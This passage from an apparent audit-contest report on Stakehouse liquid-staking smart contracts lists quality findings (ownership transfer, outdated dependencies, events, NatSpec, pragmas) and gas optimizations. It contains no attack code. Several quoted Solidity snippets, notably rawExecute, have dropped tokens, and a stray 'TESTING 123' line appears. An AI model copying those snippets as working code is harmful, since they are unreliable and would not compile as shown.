[N-12] Open TODOs 1
[N-13] Empty blocks should be removed or Emit something 10
[N-14] Avoid variable names that can shade 1
[N-15] Use a more recent version of Solidity All contracts
[N-16] Lock pragmas to specific compiler version 24

Total 16 issues


Number Suggestion Details
[S-01] Generate perfect code headers every time

Total 1 suggestion

[L-01] Draft Openzeppelin Dependencies

The LPToken.sol contract utilised draft-ERC20PermitUpgradeable.sol , an OpenZeppelin contract. This contract is still a draft and is not considered ready for mainnet use. OpenZeppelin contracts may be considered draft contracts if they have not received adequate security auditing or are liable to change with future development.



  6: import { ERC20PermitUpgradeable } from "@openzeppelin/contracts-upgradeable/token/ERC20/extensions/draft-ERC20PermitUpgradeable.sol";

[L-02] Stack too deep when compiling

The project cannot be compiled due to the “stack too deep” error.

The “stack too deep” error is a limitation of the current code generator. The EVM stack only has 16 slots and that’s sometimes not enough to fit all the local variables, parameters and/or return variables. The solution is to move some of them to memory, which is more expensive but at least makes your code compile.

[⠒] Compiling...
[⠰] Compiling 100 files with 0.8.13
[⠔] Solc 0.8.13 finished in 3.35s
Compiler run failed
CompilerError: Stack too deep when compiling inline assembly: Variable headStart is 1 slot(s) too deep inside the stack.


[L-03] Remove unused code

This code is not used in the project, remove it or add event-emit;


  100:     function _onDepositETH() internal virtual {}
  103:     function _onWithdraw(LPToken[] calldata _lpTokens) internal virtual {}
  104  }

[L-04] Insufficient coverage

Testing all functions is best practice in terms of security criteria.

This function test coverage is not found in test files

 function rawExecute(
        address target,
        bytes memory callData,
        uint256 value
    returns (bytes memory)
        (bool result, bytes memory message) ={value: value}(callData);
        require(result, "Failed to execute");
        return message;

Due to its capacity, test coverage is expected to be 100%

[L-05] Critical Address Changes Should Use Two-step Procedure

The critical procedures should be two step process.

   94:     function transferOwnership(address newOwner)
   95:         public
   96:         override(IOwnableSmartWallet, Ownable)
   97:     {

Recommended Mitigation Steps:
Lack of two-step procedure for critical operations leaves them error-prone. Consider adding two step procedure on the critical functions.

[L-06] Owner can renounce Ownership



Typically, the contract’s owner is the account that deploys the contract. As a result, the owner is able to perform certain privileged activities.

The StakeHouse Ownable used in this project contract implements renounceOwnership. This can represent a certain risk if the ownership is renounced for any other reason than by design. Renouncing ownership will leave the contract without an owner, thereby removing any functionality that is only available to the owner.

onlyOwner functions;

8 results - 2 files

   44          payable
   45:         onlyOwner // F: [OSW-6A]
   46          returns (bytes memory)

   59          payable
   60:         onlyOwner // F: [OSW-6A]
   61          returns (bytes memory)

   74      payable
   75:     onlyOwner
   76      returns (bytes memory)

  114:     function setApproval(address to, bool status) external onlyOwner override {

  147:     ) external onlyOwner {

  154:     function deRegisterKnots(bytes[] calldata _blsPublicKeys) external onlyOwner {

  161:     function addPriorityStakers(address[] calldata _priorityStakers) external onlyOwner {

  168:     function updatePriorityStakingBlock(uint256 _endBlock) external onlyOwner {

We recommend to either reimplement the function to disable it or to clearly specify if it is part of the contract design.

[L-07] Loss of precision due to rounding

Due to / PRECISION, users can avoid paying fee if claimed [][] result is below PRECISION

  200:     /// @dev Internal re-usable method for setting claimed to max for msg.sender
  201:     function _setClaimedToMax(address _user) internal {
  202:         // New ETH stakers are not entitled to ETH earned by
  203:         claimed[_user][address(lpTokenETH)] = (accumulatedETHPerLPShare * lpTokenETH.balanceOf(_user)) / PRECISION;
  204:     }

A lower limit can be added to the claimed values

[L-08] Using vulnerable dependency of OpenZeppelin

The package.json configuration file says that the project is using 4.5.0 of OZ which has a not last update version

1 result - 1 file

  10:   "dependencies": {
  14:     "@openzeppelin/contracts": "^4.5.0",
  15:     "@openzeppelin/contracts-upgradeable": "4.5.0",
H    	Improper Verification of Cryptographic Signature	<4.7.3
M   	Denial of Service (DoS)	>=2.3.0 <4.7.2
L     	Incorrect Resource Transfer Between Spheres	 >=4.6.0 <4.7.2
H	Incorrect Calculation	>=4.3.0 <4.7.2
H	Information Exposure	>=4.1.0 <4.7.1
H	Information Exposure	>=4.0.0 <4.7.1

Use patched versions
Latest non vulnerable version 4.8.0

[L-09] Use safeTransferOwnership instead of transferOwnership function


   93      /// @inheritdoc IOwnableSmartWallet
   94:     function transferOwnership(address newOwner)
   95:         public
   96:         override(IOwnableSmartWallet, Ownable)
   97:     {
   98:         // Only the owner themselves or an address that is approved for transfers
   99:         // is authorized to do this
  100:         require(
  101:             isTransferApproved(owner(), msg.sender),
  102:             "OwnableSmartWallet: Transfer is not allowed"
  103:         ); // F: [OSW-4]
  105:         // Approval is revoked, in order to avoid unintended transfer allowance
  106:         // if this wallet ever returns to the previous owner
  107:         if (msg.sender != owner()) {
  108:             _setApproval(owner(), msg.sender, false); // F: [OSW-5]
  109:         }
  110:         _transferOwnership(newOwner); // F: [OSW-5]
  111:     }

transferOwnership function is used to change Ownership

Use a 2 structure transferOwnership which is safer.
safeTransferOwnership, use it is more secure due to 2-stage ownership transfer.

Use Ownable2Step.sol

     * @dev The new owner accepts the ownership transfer.
    function acceptOwnership() external {
        address sender = _msgSender();
        require(pendingOwner() == sender, "Ownable2Step: caller is not the new owner");

[N-01] 0 address check

0 address control should be done in these parts;


Add code like this;
if (oracle == address(0)) revert ADDRESS_ZERO();

[N-02] Add parameter to Event-Emit

Some event-emit description hasn’t parameter. Add to parameter for front-end website or client app , they can has that something has happened on the blockchain.

  468      /// @dev Internal logic for initializing the syndicate contract
  469:     function _initialize(
  470:         address _contractOwner,
  471:         uint256 _priorityStakingEndBlock,
  472:         address[] memory _priorityStakers,
  473:         bytes[] memory _blsPubKeysForSyndicateKnots
  474:     ) internal {
  475:         // Transfer ownership from the deployer to the address specified as the owner
  476:         _transferOwnership(_contractOwner);
  478:         // Add the initial set of knots to the syndicate
  479:         _registerKnotsToSyndicate(_blsPubKeysForSyndicateKnots);
  481:         // Optionally process priority staking if the required params and array is configured
  482:         if (_priorityStakingEndBlock > block.number) {
  483:             priorityStakingEndBlock = _priorityStakingEndBlock;
  484:             _addPriorityStakers(_priorityStakers);
  485:         }
  487:         emit ContractDeployed();
  488:     }

[N-03] Omissions in Events

Throughout the codebase, events are generally emitted when sensitive changes are made to the contracts. However, some events are missing important parameters

The events should include the new value and old value where possible:

Events with no old value;

  254      /// @notice Allow the DAO to rotate the network ticker before the network house is created
  255:     function updateTicker(string calldata _newTicker) external onlyDAO {
  256:         require(bytes(_newTicker).length >= 3, "String must be 3-5 characters long");
  257:         require(bytes(_newTicker).length <= 5, "String must be 3-5 characters long");
  258:         require(numberOfKnots == 0, "Cannot change ticker once house is created");
  260:         stakehouseTicker = _newTicker;
  262:         emit NetworkTickerUpdated(_newTicker);
  263      }

[N-04] Include return parameters in NatSpec comments

All Contracts


If Return parameters are declared, you must prefix them with /// @return.

Some code analysis programs do analysis by reading NatSpec details, if they can’t see the “@return” tag, they do incomplete analysis.

Include return parameters in NatSpec comments

Recommendation Code Style:

   /// @notice information about what a function does
   /// @param pageId The id of the page to get the URI for.
   /// @return Returns a page's URI if it has been minted 
   function tokenURI(uint256 pageId) public view virtual override returns (string memory) {
       if (pageId == 0 || pageId > currentId) revert("NOT_MINTED");

       return string.concat(BASE_URI, pageId.toString());

[N-05] Use a more recent version of Solidity

All contracts

For security, it is best practice to use the latest Solidity version.
For the security fix list in the versions;

Old version of Solidity is used (^0.8.13), newer version can be used (0.8.17)

[N-06] Solidity compiler optimizations can be problematic

   4: module.exports = {
   5:   solidity: {
   6:     version: "0.8.13",
   7:     settings: {
   8:       optimizer: {
   9:         enabled: true,
  10:         runs: 200
  11:       }

Protocol has enabled optional compiler optimizations in Solidity.
There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them.

Therefore, it is unclear how well they are being tested and exercised.
High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG.

Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. More recently, another bug due to the incorrect caching of keccak256 was reported.
A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe.
It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations.

Exploit Scenario
A latent or future bug in Solidity compiler optimizations—or in the Emscripten transpilation to solc-js—causes a security vulnerability in the contracts.

Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug.
Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.

[N-07] NatSpec is missing

NatSpec is missing for the following functions , constructor and modifier:

27 results

  6:     function toLowerCase(string memory _base) external pure returns (string memory);
  7:     function lowercaseBrandTickerToTokenId(string memory _ticker) external returns (uint256);

  7:     function stakehouse() external view returns (address);

  6:     function liquidStakingManager() external view returns (address);

  7:     function init(

  7:     function initialize(

  6:     function beforeTokenTransfer(address _from, address _to, uint256 _amount) external;
  7:     function afterTokenTransfer(address _from, address _to, uint256 _amount) external;

  29:     function mint(address _recipient, uint256 _amount) external {
  34:     function burn(address _recipient, uint256 _amount) external {
  39:     function _beforeTokenTransfer(address _from, address _to, uint256 _amount) internal override {
  43:     function _afterTokenTransfer(address _from, address _to, uint256 _amount) internal override {

  11:     function deploy(address _liquidStakingManager) external returns (OptionalHouseGatekeeper) {

   45:     function init(address _liquidStakingManagerAddress, LPTokenFactory _lpTokenFactory) external virtual initializer {

  18:     function deploySavETHVault(address _liquidStakingManger, address _lpTokenFactory) external returns (address) {

  28:     function createWallet() external returns (address wallet) {
  32:     function createWallet(address owner) external returns (address wallet) {
  36:     function _createWallet(address owner) internal returns (address wallet) {

   9:     function createWallet() external returns (address wallet);
  11:     function createWallet(address owner) external returns (address wallet);
  13:     function walletExists(address wallet) external view returns (bool);

   6:     function accountMan() external view returns (address);
   8:     function txRouter() external view returns (address);
  10:     function uni() external view returns (address);
  12:     function slot() external view returns (address);
  14:     function saveETHRegistry() external view returns (address);
  16:     function dETH() external view returns (address);

[N-08] Lines are too long

Usually lines in source code are limited to 80 characters. Today’s screens are much larger so it’s reasonable to stretch this in some cases. Since the files will most likely reside in GitHub, and GitHub starts using a scroll bar in all cases when the length is over 164 characters, the lines below should be split when they reach that length.

9 results

  216:             if (!isKnotRegistered[_blsPubKey] || isNoLongerPartOfSyndicate[_blsPubKey]) revert KnotIsNotRegisteredWithSyndicate();

  447:         return ((calculateETHForFreeFloatingOrCollateralizedHolders() - lastSeenETHPerCollateralizedSlotPerKnot) / numberOfRegisteredKnots);

 511:                     accruedEarningPerCollateralizedSlotOwnerOfKnot[_blsPubKey][collateralizedOwnerAtIndex] += unprocessedETHForCurrentKnot;

  92:             getAccountManager().blsPublicKeyToLifecycleStatus(blsPublicKeyOfPreviousKnot) == IDataStructures.LifecycleStatus.INITIALS_REGISTERED,

  97:             getAccountManager().blsPublicKeyToLifecycleStatus(blsPublicKeyOfNewKnot) ==IDataStructures.LifecycleStatus.INITIALS_REGISTERED,

  40:         if (address(transferHookProcessor) != address(0)) ITransferHookProcessor(transferHookProcessor).beforeTokenTransfer(_from, _to, _amount);

  46:         if (address(transferHookProcessor) != address(0)) ITransferHookProcessor(transferHookProcessor).afterTokenTransfer(_from, _to, _amount);

   97:         return _previewAccumulatedETH(_user, address(lpTokenETH), lpTokenETH.balanceOf(_user), lpTokenETH.totalSupply(), accumulated);

  118:             StakingFundsVault(payable(_stakingFundsVaults[i])).batchRotateLPTokens(_oldLPTokens[i], _newLPTokens[i], _amounts[i]);

[N-09] Missing Event for critical parameters change

  66      /// @inheritdoc IOwnableSmartWallet
  67:     function rawExecute(
  68:         address target,
  69:         bytes memory callData,
  70:         uint256 value
  71:     )
  72:     external
  73:     override
  74:     payable
  75:     onlyOwner
  76:     returns (bytes memory)
  77:     {
  78:         (bool result, bytes memory message) ={value: value}(callData);
  79:         require(result, "Failed to execute");
  80:         return message;
  81:     }

Events help non-contract tools to track changes, and events prevent users from being surprised by changes

Add Event-Emit

[N-10] Add to indexed parameter for countable Events


  15      /// @notice signalize withdrawing of ETH by depositor
  16:     event ETHWithdrawnByDepositor(address depositor, uint256 amount);
  18:     /// @notice signalize burning of LP token
  19:     event LPTokenBurnt(bytes blsPublicKeyOfKnot, address token, address depositor, uint256 amount);
  21:     /// @notice signalize issuance of new LP token
  22:     event NewLPTokenIssued(bytes blsPublicKeyOfKnot, address token, address firstDepositor, uint256 amount);
  24:     /// @notice signalize issuance of existing LP token
  25:     event LPTokenMinted(bytes blsPublicKeyOfKnot, address token, address depositor, uint256 amount);

Add to indexed parameter for countable Events

Add Event-Emit

[N-11] NatSpec comments should be increased in contracts

All Contracts

It is recommended that Solidity contracts are fully annotated using NatSpec for all public interfaces (everything in the ABI). It is clearly stated in the Solidity official documentation.
In complex projects such as Defi, the interpretation of all functions and their arguments and returns is important for code readability and auditability.

NatSpec comments should be increased in contracts

[N-12] Open TODOs


1 result

  194          } else {
  195:             // todo - check else case for any ETH lost
  196          }

Use temporary TODOs as you work on a feature, but make sure to treat them before merging. Either add a link to a proper issue in your TODO, or remove it from the code.

[N-13] Empty blocks should be removed or Emit something

Code contains empty block

10 results - 8 files

  101:     function _onDepositETH() internal virtual {}
  104:     function _onWithdraw(LPToken[] calldata _lpTokens) internal virtual {}
  166:     constructor() initializer {}
  629:     receive() external payable {}

  28:     constructor() initializer {}
  43:     constructor() initializer {}
  43:     constructor() initializer {}
  98:     receive() external payable {}

  25:     constructor() initializer {}
  123:     constructor() initializer {}

The code should be refactored such that they no longer exist, or the block should do something useful, such as emitting an event or reverting.

[N-14] Avoid variable names that can shade

With global variable names in the form of call{value: value } , argument name similarities can shade and negatively affect code readability.

  77:     {
  78:         (bool result, bytes memory message) ={value: value}(callData);
  79:         require(result, "Failed to execute");
  80:         return message;
  81:     }

[N-15] Use a more recent version of Solidity

All contracts

For security, it is best practice to use the latest Solidity version.
For the security fix list in the versions;

Old version of Solidity is used (0.8.13), newer version can be used (0.8.17)

[N-16] Lock pragmas to specific compiler version

Pragma statements can be allowed to float when a contract is intended for consumption by other developers, as in the case with contracts in a library or EthPM package. Otherwise, the developer would need to manually update the pragma in order to compile locally.

Ethereum Smart Contract Best Practices - Lock pragmas to specific compiler version.

24 files

pragma solidity ^0.8.13;

[S-01] Generate perfect code headers every time

I recommend using header for Solidity code layout and readability

                           TESTING 123

vince0656 (Stakehouse) commented:

Good quality

Gas Optimizations

For this contest, 18 reports were submitted by wardens detailing gas optimizations. The report highlighted below by IllIllI received the top score from the judge.

The following wardens also submitted reports: Deivitto, 0xSmartContract, ignacio, lukris02, c3phas, CloudX, brgltd, Aymen0909, tnevler, btk, bharg4v, Awesome, chrisdior4, imare, Saintcode_, skyle, and ReyAdmirado.


Issue Instances Total Gas Saved
[G‑01] Multiple address/ID mappings can be combined into a single mapping of an address/ID to a struct, where appropriate 1 -
[G‑02] State variables only set in the constructor should be declared immutable 33 31201
[G‑03] Using calldata instead of memory for read-only arguments in external functions saves gas 8 960
[G‑04] State variables should be cached in stack variables rather than re-reading them from storage 16 1552
[G‑05] The result of function calls should be cached rather than re-calling the function 1 -
[G‑06] <x> += <y> costs more gas than <x> = <x> + <y> for state variables 16 1808
[G‑07] internal functions only called once can be inlined to save gas 9 180
[G‑08] ++i/i++ should be unchecked{++i}/unchecked{i++} when it is not possible for them to overflow, as is the case when used in for- and while-loops 38 2280
[G‑09] require()/revert() strings longer than 32 bytes cost extra gas 39 -
[G‑10] Optimize names to save gas 16 352
[G‑11] internal functions not called by the contract should be removed to save deployment gas 2 -
[G‑12] Don’t compare boolean expressions to boolean literals 19 171
[G‑13] Ternary unnecessary 1 -
[G‑14] Division by two should use bit shifting 1 20
[G‑15] Stack variable used as a cheaper cache for a state variable is only used once 1 3
[G‑16] Empty blocks should be removed or emit something 1 -
[G‑17] Use custom errors rather than revert()/require() strings to save gas 21 -
[G‑18] Functions guaranteed to revert when called by normal users can be marked payable 20 420

Total: 243 instances over 18 issues with 38947 gas saved

Gas totals use lower bounds of ranges and count two iterations of each for-loop. All values above are runtime, not deployment, values; deployment values are listed in the individual issue descriptions. The table above as well as its gas numbers do not include any of the excluded findings.

[G‑01] Multiple address/ID mappings can be combined into a single mapping of an address/ID to a struct, where appropriate

Saves a storage slot for the mapping. Depending on the circumstances and sizes of types, can avoid a Gsset (20000 gas) per mapping combined. Reads and subsequent writes can also be cheaper when a function requires both values and they both fit in the same storage slot. Finally, if both fields are accessed in the same function, can save ~42 gas per access due to not having to recalculate the key’s keccak256 hash (Gkeccak256 - 30 gas) and that calculation’s associated stack operations.

There is 1 instance of this issue:

File: contracts/liquid-staking/LiquidStakingManager.sol

134       /// @notice Node runner issued to Smart wallet. Smart wallet address <> Node runner address
135       mapping(address => address) public nodeRunnerOfSmartWallet;
137       /// @notice Track number of staked KNOTs of a smart wallet
138:      mapping(address => uint256) public stakedKnotsOfSmartWallet;

[G‑02] State variables only set in the constructor should be declared immutable

Avoids a Gsset (20000 gas) in the constructor, and replaces the first access in each transaction (Gcoldsload - 2100 gas) and each access thereafter (Gwarmacces - 100 gas) with a PUSH32 (3 gas).

While strings are not value types, and therefore cannot be immutable/constant if not hard-coded outside of the constructor, the same behavior can be achieved by making the current contract abstract with virtual functions for the string accessors, and having a child contract override the functions with the hard-coded implementation-specific values.

*There are 33 instances of this issue. (For in-depth details on this and all further gas optimizations with multiple instances, see the warden’s full report.)*

[G‑03] Using calldata instead of memory for read-only arguments in external functions saves gas

When a function with a memory array is called externally, the abi.decode() step has to use a for-loop to copy each index of the calldata to the memory index. Each iteration of this for-loop costs at least 60 gas (i.e. 60 * <mem_array>.length). Using calldata directly, obliviates the need for such a loop in the contract code and runtime execution. Note that even if an interface defines a function as having memory arguments, it’s still valid for implementation contracs to use calldata arguments instead.

If the array is passed to an internal function which passes the array to another internal function where the array is modified and therefore memory is used in the external call, it’s still more gass-efficient to use calldata when the external function uses modifiers, since the modifiers may prevent the internal functions from being called. Structs have the same overhead as an array of length one

Note that I’ve also flagged instances where the function is public but can be marked as external since it’s not called by the contract, and cases where a constructor is involved

There are 8 instances of this issue.

[G‑04] State variables should be cached in stack variables rather than re-reading them from storage

The instances in this report point to the second+ access of a state variable within a function. Caching of a state variable replaces each Gwarmaccess (100 gas) with a much cheaper stack read. Other less obvious fixes/optimizations include having local memory caches of state variable structs, or having local caches of state variable contracts/addresses.

There are 16 instances of this issue.

[G‑05] The result of function calls should be cached rather than re-calling the function

The instances in this report point to the second+ call of the function within a single function.

There is 1 instance of this issue:

File: contracts/liquid-staking/StakingFundsVault.sol

/// @audit liquidStakingNetworkManager.syndicate() on line 215
219:                      liquidStakingNetworkManager.syndicate(),

[G‑06] <x> += <y> costs more gas than <x> = <x> + <y> for state variables

Using the addition operator instead of plus-equals saves 113 gas.

There are 16 instances of this issue.

[G‑07] internal functions only called once can be inlined to save gas

Not inlining costs 20 to 40 gas because of two extra JUMP instructions and additional stack operations needed for function calls.

There are 9 instances of this issue.

[G‑08] ++i/i++ should be unchecked{++i}/unchecked{i++} when it is not possible for them to overflow, as is the case when used in for- and while-loops

The unchecked keyword is new in solidity version 0.8.0, so this only applies to that version or higher, which these instances are. This saves 30-40 gas per loop.

There are 38 instances of this issue.

[G‑09] require()/revert() strings longer than 32 bytes cost extra gas

Each extra memory word of bytes past the original 32 incurs an MSTORE which costs 3 gas.

There are 39 instances of this issue.

[G‑10] Optimize names to save gas

public/external function names and public member variable names can be optimized to save gas. See this link for an example of how it works. In this report are the interfaces/abstract contracts that can be optimized so that the most frequently-called functions use the least amount of gas possible during method lookup. Method IDs that have two leading zero bytes can save 128 gas each during deployment, and renaming functions to have lower method IDs will save 22 gas per call, per sorted position shifted.

There are 16 instances of this issue.

[G‑11] internal functions not called by the contract should be removed to save deployment gas

If the functions are required by an interface, the contract should inherit from that interface and use the override keyword.

There are 2 instances of this issue:

File: contracts/syndicate/Syndicate.sol

538:      function _calculateCollateralizedETHOwedPerKnot() internal view returns (uint256) {

545:      function _calculateNewAccumulatedETHPerCollateralizedShare(uint256 _ethSinceLastUpdate) internal view returns (uint256) {

[G‑12] Don’t compare boolean expressions to boolean literals

if (<x> == true) => if (<x>), if (<x> == false) => if (!<x>)

There are 19 instances of this issue.

[G‑13] Ternary unnecessary

z = (x == y) ? true : false => z = (x == y)

There is 1 instance of this issue:

File: contracts/smart-wallet/OwnableSmartWallet.sol

145:          return from == to ? true : _isTransferApproved[from][to]; // F: [OSW-2, 3]

[G‑14] Division by two should use bit shifting

<x> / 2 is the same as <x> >> 1. While the compiler uses the SHR opcode to accomplish both, the version that uses division incurs an overhead of 20 gas due to JUMPs to and from a compiler utility function that introduces checks which can be avoided by using unchecked {} around the division by two.

There is 1 instance of this issue:

File: contracts/syndicate/Syndicate.sol

378:          return ethPerKnot / 2;

[G‑15] Stack variable used as a cheaper cache for a state variable is only used once

If the variable is only accessed once, it’s cheaper to use the state variable directly that one time, and save the 3 gas the extra stack assignment would spend.

There is 1 instance of this issue:

File: contracts/syndicate/Syndicate.sol

388:          uint256 currentAccumulatedETHPerFreeFloatingShare = accumulatedETHPerFreeFloatingShare;

[G‑16] Empty blocks should be removed or emit something

The code should be refactored such that they no longer exist, or the block should do something useful, such as emitting an event or reverting. If the contract is meant to be extended, the contract should be abstract and the function signatures be added without any default implementation. If the block is an empty if-statement block to avoid doing subsequent checks in the else-if/else conditions, the else-if/else conditions should be nested under the negation of the if-statement, because they involve different classes of checks, which may lead to the introduction of errors when the code is later modified (if(x){}else if(y){...}else{...} => if(!x){if(y){...}else{...}}). Empty receive()/fallback() payable functions that are not used, can be removed to save deployment gas.

There is 1 instance of this issue:

File: contracts/syndicate/Syndicate.sol

194           } else {
195               // todo - check else case for any ETH lost
196:          }

[G‑17] Use custom errors rather than revert()/require() strings to save gas

Custom errors are available from solidity version 0.8.4. Custom errors save ~50 gas each time they’re hit by avoiding having to allocate and store the revert string. Not defining the strings also save deployment gas.

There are 21 instances of this issue.

[G‑18] Functions guaranteed to revert when called by normal users can be marked payable

If a function modifier such as onlyOwner is used, the function will revert if a normal user tries to pay the function. Marking the function as payable will lower the gas cost for legitimate callers because the compiler will not include checks for whether a payment was provided. The extra opcodes avoided are CALLVALUE(2),DUP1(3),ISZERO(3),PUSH2(3),JUMPI(10),PUSH1(3),DUP1(3),REVERT(0),JUMPDEST(1),POP(2), which costs an average of about 21 gas per call to the function, in addition to the extra deployment cost.

There are 20 instances of this issue.

Excluded Gas Findings

These findings are excluded from awards calculations because there are publicly-available automated tools that find them. The valid ones appear here for completeness

Issue Instances Total Gas Saved
[G‑19] <array>.length should not be looked up in every loop of a for-loop 16 48
[G‑20] Using bools for storage incurs overhead 9 153900
[G‑21] ++i costs less gas than i++, especially when it’s used in for-loops (--i/i-- too) 1 5
[G‑22] Using private rather than public for constants, saves gas 4 -
[G‑23] Use custom errors rather than revert()/require() strings to save gas 198 -

Total: 228 instances over 5 issues with 153953 gas saved

Gas totals use lower bounds of ranges and count two iterations of each for-loop. All values above are runtime, not deployment, values; deployment values are listed in the individual issue descriptions.

[G‑19] <array>.length should not be looked up in every loop of a for-loop

The overheads outlined in this report are PER LOOP, excluding the first loop

  • storage arrays incur a Gwarmaccess (100 gas)
  • memory arrays use MLOAD (3 gas)
  • calldata arrays use CALLDATALOAD (3 gas)

Caching the length changes each of these to a DUP<N> (3 gas), and gets rid of the extra DUP<N> needed to store the stack offset

There are 16 instances of this issue.

[G‑20] Using bools for storage incurs overhead

    // Booleans are more expensive than uint256 or any type that takes up a full
    // word because each write operation emits an extra SLOAD to first read the
    // slot's contents, replace the bits taken up by the boolean, and then write
    // back. This is the compiler's defense against contract upgrades and
    // pointer aliasing, and it cannot be disabled.
Use uint256(1) and uint256(2) for true/false to avoid a Gwarmaccess (100 gas) for the extra SLOAD, and to avoid Gsset (20000 gas) when changing from false to true, after having been true in the past.

There are 9 instances of this issue.

[G‑21] ++i costs less gas than i++, especially when it’s used in for-loops (--i/i-- too)

Saves 5 gas per loop

There is 1 instance of this issue:

File: contracts/liquid-staking/ETHPoolLPFactory.sol

/// @audit (valid but excluded finding)
141:              numberOfLPTokensIssued++;

[G‑22] Using private rather than public for constants, saves gas

If needed, the values can be read from the verified contract source code, or if there are multiple values there can be a single getter function that returns a tuple of the values of all currently-public constants. Saves 3406-3606 gas in deployment gas due to the compiler not having to create non-payable getter functions for deployment calldata, not having to store the bytes of the value outside of where it’s used, and not adding another entry to the method ID table.

There are 4 instances of this issue.

[G‑23] Use custom errors rather than revert()/require() strings to save gas

Custom errors are available from solidity version 0.8.4. Custom errors save ~50 gas each time they’re hit by avoiding having to allocate and store the revert string. Not defining the strings also save deployment gas.

There are 198 instances of this issue.